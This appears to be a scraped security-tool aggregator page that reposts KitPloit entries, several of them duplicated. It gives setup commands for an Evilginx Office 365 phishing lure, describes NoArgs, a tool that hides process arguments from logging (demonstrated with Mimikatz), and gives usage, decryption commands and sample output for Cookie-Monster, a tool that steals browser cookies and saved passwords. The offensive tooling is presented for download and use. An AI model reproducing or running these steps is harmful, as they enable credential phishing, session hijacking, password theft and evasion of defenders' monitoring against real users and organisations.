Channel: Ethical Hackers Vol. 2
Start Evilginx in developer mode (using tmux to avoid losing the session): tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
(To re-attach to the tmux session use tmux attach-session -t evilginx) Evilginx Config: config domain fake.com
config ipv4 127.0.0.1
IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting (https://www.kitploit.com/search/label/Blacklisting) Apache since all requests will be coming from Apache and not the actual visitor IP. blacklist noadd
Setup Phishlet and Lure: phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests). Useful Resources Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/ TODO Create script(s) to automate most of the steps
Download Frameless-Bitb (https://github.com/waelmas/frameless-bitb)
cd ~/evilginx/
./evilginx -developer
(To re-attach to the tmux session use tmux attach-session -t evilginx) Evilginx Config: config domain fake.com
config ipv4 127.0.0.1
IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting (https://www.kitploit.com/search/label/Blacklisting) Apache since all requests will be coming from Apache and not the actual visitor IP. blacklist noadd
Setup Phishlet and Lure: phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests). Useful Resources Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/ TODO Create script(s) to automate most of the steps
Download Frameless-Bitb (https://github.com/waelmas/frameless-bitb)
NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected
http://www.kitploit.com/2024/04/noargs-tool-designed-to-dynamically.html
http://www.kitploit.com/2024/04/noargs-tool-designed-to-dynamically.html
NoArgs is a tool designed to dynamic (https://www.kitploit.com/search/label/Dynamic)ally spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamic (https://www.kitploit.com/search/label/Dynamic)ally manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.
Default Cmd:
Default Cmd:
Functionality Overview The tool primarily operates by intercept (https://www.kitploit.com/search/label/Intercept)ing process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched. Hooking Mechanism Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned. Process Environment Block (PEB) Manipulation The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process. Demo: Running Mimikatz and passing it the arguments: Process Hacker View:
All the arguemnts are hidden dynamically Process Monitor View:
Technical Implementation Injection (https://www.kitploit.com/search/label/Injection) into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page) Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments. Execution Redirection: Upon completion of the manipulation (https://www.kitploit.com/search/label/Manipulation)s, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation (https://www.kitploit.com/search/label/Manipulation) discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB. Installation and Usage: Option 1: Compile NoArgs DLL: You will need microsoft ( https:=)/Detours">Microsoft Detours installed. Compile the DLL. Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically. Option 2: Download the compiled executable (ready-to-go) from the releases page (https://github.com/oh-az/NoArgs/releases/tag/releases). Refrences: https://en.wikipedia.org/wiki/Microsoft_Detours https://github.com/microsoft/Detours https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/ https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++
Download NoArgs (https://github.com/oh-az/NoArgs)
Download NoArgs (https://github.com/oh-az/NoArgs)
Cookie-Monster - BOF To Steal Browser Cookies & Credentials
http://www.kitploit.com/2024/04/cookie-monster-bof-to-steal-browser.html
http://www.kitploit.com/2024/04/cookie-monster-bof-to-steal-browser.html
Steal browser cookies (https://www.kitploit.com/search/label/Cookies) for edge, chrome and firefox (https://www.kitploit.com/search/label/Firefox) through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then fileless (https://www.kitploit.com/search/label/Fileless)ly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption (https://www.kitploit.com/search/label/Decryption) script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption (https://www.kitploit.com/search/label/Decryption).
BOF Usage Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID || --chromeLoginDataPID || --edgeCookiePID || --edgeLoginDataPID ]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
EXE usage Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Decryption Steps Install requirements pip3 install -r requirements.txt
Base64 encode the webkit masterkey python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chome/Edge Passwords (https://www.kitploit.com/search/label/Passwords) File python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd Installation Ensure Mingw-w64 and make is installed on the linux prior to compiling. make
to compile exe on windows gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
BOF Usage Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID || --chromeLoginDataPID || --edgeCookiePID || --edgeLoginDataPID ]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
EXE usage Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Decryption Steps Install requirements pip3 install -r requirements.txt
Base64 encode the webkit masterkey python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chome/Edge Passwords (https://www.kitploit.com/search/label/Passwords) File python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd Installation Ensure Mingw-w64 and make is installed on the linux prior to compiling. make
to compile exe on windows gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
TO-DO update decrypt.py to support firefox based on firepwd (https://github.com/lclevy/firepwd) and add bruteforce module based on DonPAPI (https://github.com/login-securite/DonPAPI) References This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
Download Cookie-Monster (https://github.com/KingOfTheNOPs/cookie-monster)
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
Download Cookie-Monster (https://github.com/KingOfTheNOPs/cookie-monster)
HTML Embed Code: